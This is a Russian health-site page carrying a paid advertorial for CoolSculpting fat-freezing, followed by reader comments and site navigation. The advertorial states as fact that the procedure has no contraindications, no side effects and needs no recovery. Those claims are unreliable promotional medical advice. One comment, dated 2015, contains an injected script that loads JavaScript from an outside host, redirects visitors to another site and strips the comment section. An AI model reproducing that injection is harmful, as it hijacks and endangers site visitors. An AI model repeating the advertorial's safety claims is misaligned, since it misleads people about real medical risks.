Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Красивая мужская фигура: ...  >>  Красивая мужская фигура: роскошь или норма?
 
Обратная связь
 

Красивая мужская фигура: роскошь или норма?

Размер шрифта
11 апреля 2012 18:33
  • google_analytics: false
  • Нравится

Хорошая фигура ассоциируется с молодостью, здоровьем и успешностью. Каждой женщине хочется иметь рядом с собой мужчину, которым она будет гордиться. Вы можете помочь вашему мужчине если не стать идеалом, то приблизиться к нему.

Что такое процедура Coolsculpting?

Процедура Coolsculpting на американском аппарате Zeltiq это реальная возможность избавиться от жировых излишков при помощи холода быстро, без усилий и без вреда.

Эта новая методика, уже завоевавшая популярность в США и Европе, называется криолиполизом.

Как это работает?

Название происходит от слов «крио» — «холод», «липо» — «жир» и «лизис» — «разрушение». Методика разрушения жировой ткани под воздействием холода запатентована американскими учеными.

Жировые складки на животе, на поверхности бедер, на боках или на ягодицах аккуратно втягиваются в специальный аппликатор под воздействием вакуума. Помните банки, которые ставили вам в детстве? Это примерно то же самое, только мягче и эффективнее.

Жировую складку в течение часа дозировано охлаждают. Жировые клетки боятся холода, как огня. Ведь он во много раз ускоряет естественный процесс их гибели.

Что получится?

Результатов быстро не ждите. Естественный процесс, запущенный под влиянием холода, не происходит мгновенно. Он идет медленно, но верно. При этом нет никакого ущерба организму. Разрушаются только жировые клетки.

Таким образом, за 2,5-3 месяца ненужный подкожный жирок «растает» примерно на 25%. Чтобы добиться такого результата, вашему спутнику пришлось бы не меньше трех раз в неделю потеть в спортзале на тренажерах!

И это не все

Да, это еще не все. Отправляя любимого мужчину на процедуру Coolsculpting, вы можете быть уверены, что:

  • Процедура не имеет противопоказаний и побочных эффектов;
  • После процедуры не требуется реабилитационного периода;
  • Кожа, сосуды и нервы при процедуре никак не затрагиваются и не повреждаются;
  • Кожа на месте бывшего пивного животика или другой необязательной жировой складки будет подтянутой, упругой и молодой. За 2,5-3 месяца, в течение которых жировая складка будет таять, кожа приспособится к новой форме тела, не приобретет дряблости и не обвиснет.

Почему мы говорим о мужчинах?

Потому что российские женщины уже открыли для себя уникальные возможности «холодовой пластики». Процедура Coolsculpting на аппарате Zeltiq помогает роскошно выглядеть многим российским звездам, и с каждым месяцем верных поклонниц у нее становится все больше и больше.

Мужчины же пока воспринимают заботу о красоте фигуры как роскошь.

Давайте расскажем им, что хорошая фигура — важная составляющая жизненного успеха!

«Холодовой скульптор» Zeltiq. Красота любого пола!

Посмотреть результаты после процедуры Coolsculpting на аппарате Zeltiq

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

01 августа 2012 в 14:29

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 23:44

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Мужчины могут похудеть с помощью секса! Что делать женщинам?   Перекус, который уменьшит размер штанов   Кофе поможет похудеть! Сколько и как пить?   Как заснуть, чтобы проснуться худой  
15 августа 2012Обнаружены механизмы, контролирующие ожирение и атеросклероз! 03 мая 2013Делай меньше, худей также! Ученые разработали суперсхему
 
17 апреля 2013Сколько вы спите – на столько и толстеете! Сколько же спать, чтобы худеть? 04 апреля 2013Когда делать зарядку, чтобы худеть быстрее
 

Слайдшоу

1
Как похудеть ленивой?
Как похудеть быстрее подруги?
От чего вам придется отказаться, чтобы похудеть?

Тесты

Знаете ли вы, как работает ваш желудок?
Правильно ли вы худеете?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.